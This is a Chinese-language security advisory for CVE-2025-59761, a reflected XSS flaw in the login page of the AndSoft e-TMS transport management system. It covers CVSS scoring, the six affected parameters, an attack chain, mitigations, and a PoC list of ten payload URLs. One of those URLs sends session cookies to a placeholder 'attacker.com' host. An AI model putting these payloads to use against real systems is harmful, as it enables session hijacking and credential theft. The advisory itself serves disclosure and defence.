CVE-2025-59761：AndSoft e-TMS反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59761

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59761是存在于AndSoft公司开发的e-TMS运输管理系统中的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞于2025年10月2日由西班牙国家网络安全研究所（INCIBE）披露，CVSS评分为6.1，属于中危级别。

AndSoft e-TMS是一款广泛应用于物流和运输行业的运输管理系统，用于管理订单、运输、车队等业务。该系统在登录页面/clt/LOGINFRM_DLG.ASP中存在多个未经过滤的用户输入参数，包括l、demo、demo2、TNTLOGIN、UO和SuppConn等共6个参数。这些参数接收的用户输入未经适当的HTML实体编码或输出转义处理，直接被嵌入到返回的HTML页面中，导致攻击者可以构造恶意URL，将JavaScript代码注入到受害者的浏览器上下文中执行。

该漏洞的攻击向量为网络（AV:N），无需认证即可利用（PR:N），但需要用户交互（UI:R），即受害者需要点击攻击者构造的恶意链接。漏洞的影响范围为变更（S:C），表明该漏洞可能影响到登录页面以外的组件。成功利用该漏洞可导致机密性影响低（C:L）和完整性影响低（I:L），但不影响系统可用性（A:N）。攻击者可以利用此漏洞窃取用户会话cookie、进行钓鱼攻击、劫持用户会话或在受害者浏览器中执行任意JavaScript代码，对企业和用户的数据安全构成威胁。

技术细节

该漏洞的根本原因是AndSoft e-TMS v25.03的登录页面/clt/LOGINFRM_DLG.ASP对用户输入参数缺乏充分的输出编码和过滤机制。具体而言，以下6个参数存在反射型XSS漏洞：

1. 'l' 参数
2. 'demo' 参数
3. 'demo2' 参数
4. 'TNTLOGIN' 参数
5. 'UO' 参数
6. 'SuppConn' 参数

当用户访问包含这些参数的恶意构造URL时，服务器直接将参数值嵌入到返回的HTML响应中，而未对特殊字符（如<、>、"、'等）进行HTML实体编码。攻击者可以在参数值中注入任意JavaScript代码，这些代码将在受害者的浏览器上下文中执行。

利用方式如下：
1. 攻击者构造一个包含恶意JavaScript代码的URL，URL指向目标系统的/clt/LOGINFRM_DLG.ASP页面，并在其中一个易受攻击的参数中注入payload。
2. 攻击者通过钓鱼邮件、社交工程或其他方式诱导受害者点击该恶意URL。
3. 受害者点击链接后，恶意JavaScript代码在受害者的浏览器中执行，可能导致会话劫持、cookie窃取、钓鱼表单注入或恶意重定向等攻击。

由于该漏洞的CVSS向量中包含S:C（范围变更），表明成功利用该漏洞可能影响到e-TMS系统中的其他安全边界组件，扩大了攻击的影响范围。

攻击链分析

STEP 1

步骤1：漏洞侦察

攻击者通过信息收集确定目标使用AndSoft e-TMS v25.03系统，并定位到登录页面/clt/LOGINFRM_DLG.ASP存在多个未过滤的用户输入参数。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript代码的URL，在l、demo、demo2、TNTLOGIN、UO或SuppConn等参数中注入XSS payload。

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、即时消息、社交媒体或其他社会工程手段，将恶意URL发送给目标用户。

STEP 4

步骤4：触发漏洞

受害者点击恶意链接，浏览器向目标e-TMS服务器发送请求，服务器将未转义的恶意脚本嵌入HTML响应中返回。

STEP 5

步骤5：执行恶意代码

浏览器解析HTML响应并执行嵌入的JavaScript代码，攻击者可以窃取会话cookie、进行钓鱼表单注入或执行其他恶意操作。

STEP 6

步骤6：扩大影响

由于漏洞范围为变更（S:C），攻击者可能利用窃取的会话信息访问e-TMS系统的其他安全区域，进一步渗透企业内部网络。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59761 - AndSoft e-TMS Reflected XSS PoC -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_DLG.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- PoC 1: Using 'l' parameter -->
https://target.com/clt/LOGINFRM_DLG.ASP?l=<script>alert('XSS-CVE-2025-59761')</script>

<!-- PoC 2: Using 'demo' parameter -->
https://target.com/clt/LOGINFRM_DLG.ASP?demo=<script>alert(document.cookie)</script>

<!-- PoC 3: Using 'demo2' parameter -->
https://target.com/clt/LOGINFRM_DLG.ASP?demo2=<script>alert('XSS')</script>

<!-- PoC 4: Using 'TNTLOGIN' parameter -->
https://target.com/clt/LOGINFRM_DLG.ASP?TNTLOGIN=<script>alert('XSS')</script>

<!-- PoC 5: Using 'UO' parameter -->
https://target.com/clt/LOGINFRM_DLG.ASP?UO=<script>alert('XSS')</script>

<!-- PoC 6: Using 'SuppConn' parameter -->
https://target.com/clt/LOGINFRM_DLG.ASP?SuppConn=<script>alert('XSS')</script>

<!-- PoC 7: Cookie stealing payload using 'l' parameter -->
https://target.com/clt/LOGINFRM_DLG.ASP?l=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

<!-- PoC 8: Using event handler (alternative bypass) -->
https://target.com/clt/LOGINFRM_DLG.ASP?l=<img src=x onerror=alert('XSS-CVE-2025-59761')>

<!-- PoC 9: Using SVG tag (alternative bypass) -->
https://target.com/clt/LOGINFRM_DLG.ASP?demo=<svg onload=alert('XSS')></svg>

<!-- PoC 10: Combined parameters exploitation -->
https://target.com/clt/LOGINFRM_DLG.ASP?l=<script>alert('XSS')</script>&demo=<script>alert('XSS2')</script>&TNTLOGIN=<script>alert('XSS3')</script>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对e-TMS系统的访问实施网络访问控制，限制仅授权用户和IP地址可访问/clt/LOGINFRM_DLG.ASP页面；2）部署Web应用防火墙（WAF），配置针对XSS攻击特征的检测规则，对URL中的可疑参数值进行过滤；3）实施Content Security Policy（CSP），通过HTTP响应头限制页面可执行的脚本来源；4）为所有会话Cookie设置HttpOnly和Secure标志，防止XSS攻击窃取会话信息；5）对员工进行安全意识培训，警惕来源不明的链接，特别是包含可疑参数的e-TMS系统链接；6）监控Web服务器日志，及时发现可疑的XSS攻击尝试。